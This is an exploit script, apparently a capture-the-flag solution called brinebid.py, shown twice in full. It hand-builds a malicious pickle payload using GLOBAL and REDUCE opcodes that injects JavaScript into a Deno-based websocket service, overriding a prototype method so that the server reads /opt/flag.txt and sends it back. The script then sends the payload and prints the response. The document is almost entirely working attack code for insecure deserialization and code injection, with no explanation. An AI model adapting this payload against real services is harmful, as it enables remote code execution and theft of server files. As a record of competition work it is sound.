tyage/brinebid.py

## brinebid.py
from websocket import create_connection

from base64 import b64encode, b64decode
import pickle

ticket = 'ticket{}'
ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket])

PICKLE_OP_NAMES = {
     "MARK": '(',
     "STOP": '.',
     "POP": '0',
     "POP_MARK": '1',
     "DUP": '2',
     "FLOAT": 'F',
     "INT": 'I',
     "BININT": 'J',
     "BININT1": 'K',
     "LONG": 'L',
     "BININT2": 'M',
     "NONE": 'N',
     "PERSID": 'P',
     "BINPERSID": 'Q',
     "REDUCE": 'R',
     "STRING": 'S',
     "BINSTRING": 'T',
     "SHORT_BINSTRING": 'U',
     "UNICODE": 'V',
     "BINUNICODE": 'X',
     "APPEND": 'a',
     "BUILD": 'b',
     "GLOBAL": 'c',
     "DICT": 'd',
     "EMPTY_DICT": '}',
     "APPENDS": 'e',
     "GET": 'g',
     "BINGET": 'h',
     "INST": 'i',
     "LONG_BINGET": 'j',
     "LIST": 'l',
     "EMPTY_LIST": ']',
     "OBJ": 'o',
     "PUT": 'p',
     "BINPUT": 'q',
     "LONG_BINPUT": 'r',
     "SETITEM": 's',
     "TUPLE": 't',
     "EMPTY_TUPLE": ')',
     "SETITEMS": 'u',
     "PROTO": '\x80',
     "NEWOBJ": '\x81',
     "TUPLE1": '\x85',
     "TUPLE2": '\x86',
     "TUPLE3": '\x87',
     "NEWTRUE": '\x88',
     "NEWFALSE": '\x89',
     "LONG1": '\x8a',
     "LONG4": '\x8b',
     "BINBYTES": 'B',
     "SHORT_BINBYTES": 'C'
};


payload = ""

payload += PICKLE_OP_NAMES["GLOBAL"] + "builtins\ndict\n"
payload += PICKLE_OP_NAMES["UNICODE"] + "prototype\n"
payload += PICKLE_OP_NAMES["GET"] + "getPrototypeOf\n"
payload += PICKLE_OP_NAMES["SETITEM"]

payload += PICKLE_OP_NAMES["GLOBAL"] + "builtins\ndict\n"
payload += PICKLE_OP_NAMES["UNICODE"] + "arguments[0].prototype.process=(ws) => {Deno.readTextFile('/opt/flag.txt').then(f => ws.send(f))}; return new arguments[0]()\n"
payload += PICKLE_OP_NAMES["REDUCE"]

payload += PICKLE_OP_NAMES["GLOBAL"] + "__main__\nWalletRequest\n"
payload += PICKLE_OP_NAMES["REDUCE"]

data = b64encode(payload.encode('utf-8')).decode('utf-8')
print(data)
ws.send(data)

recv = ws.recv()
data = b64decode(recv)
print(data)

ws.close()
	from websocket import create_connection

	from base64 import b64encode, b64decode
	import pickle

	ticket = 'ticket{}'
	ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket])

	PICKLE_OP_NAMES = {
	"MARK": '(',
	"STOP": '.',
	"POP": '0',
	"POP_MARK": '1',
	"DUP": '2',
	"FLOAT": 'F',
	"INT": 'I',
	"BININT": 'J',
	"BININT1": 'K',
	"LONG": 'L',
	"BININT2": 'M',
	"NONE": 'N',
	"PERSID": 'P',
	"BINPERSID": 'Q',
	"REDUCE": 'R',
	"STRING": 'S',
	"BINSTRING": 'T',
	"SHORT_BINSTRING": 'U',
	"UNICODE": 'V',
	"BINUNICODE": 'X',
	"APPEND": 'a',
	"BUILD": 'b',
	"GLOBAL": 'c',
	"DICT": 'd',
	"EMPTY_DICT": '}',
	"APPENDS": 'e',
	"GET": 'g',
	"BINGET": 'h',
	"INST": 'i',
	"LONG_BINGET": 'j',
	"LIST": 'l',
	"EMPTY_LIST": ']',
	"OBJ": 'o',
	"PUT": 'p',
	"BINPUT": 'q',
	"LONG_BINPUT": 'r',
	"SETITEM": 's',
	"TUPLE": 't',
	"EMPTY_TUPLE": ')',
	"SETITEMS": 'u',
	"PROTO": '\x80',
	"NEWOBJ": '\x81',
	"TUPLE1": '\x85',
	"TUPLE2": '\x86',
	"TUPLE3": '\x87',
	"NEWTRUE": '\x88',
	"NEWFALSE": '\x89',
	"LONG1": '\x8a',
	"LONG4": '\x8b',
	"BINBYTES": 'B',
	"SHORT_BINBYTES": 'C'
	};


	payload = ""

	payload += PICKLE_OP_NAMES["GLOBAL"] + "builtins\ndict\n"
	payload += PICKLE_OP_NAMES["UNICODE"] + "prototype\n"
	payload += PICKLE_OP_NAMES["GET"] + "getPrototypeOf\n"
	payload += PICKLE_OP_NAMES["SETITEM"]

	payload += PICKLE_OP_NAMES["GLOBAL"] + "builtins\ndict\n"
	payload += PICKLE_OP_NAMES["UNICODE"] + "arguments[0].prototype.process=(ws) => {Deno.readTextFile('/opt/flag.txt').then(f => ws.send(f))}; return new arguments[0]()\n"
	payload += PICKLE_OP_NAMES["REDUCE"]

	payload += PICKLE_OP_NAMES["GLOBAL"] + "__main__\nWalletRequest\n"
	payload += PICKLE_OP_NAMES["REDUCE"]

	data = b64encode(payload.encode('utf-8')).decode('utf-8')
	print(data)
	ws.send(data)

	recv = ws.recv()
	data = b64decode(recv)
	print(data)

	ws.close()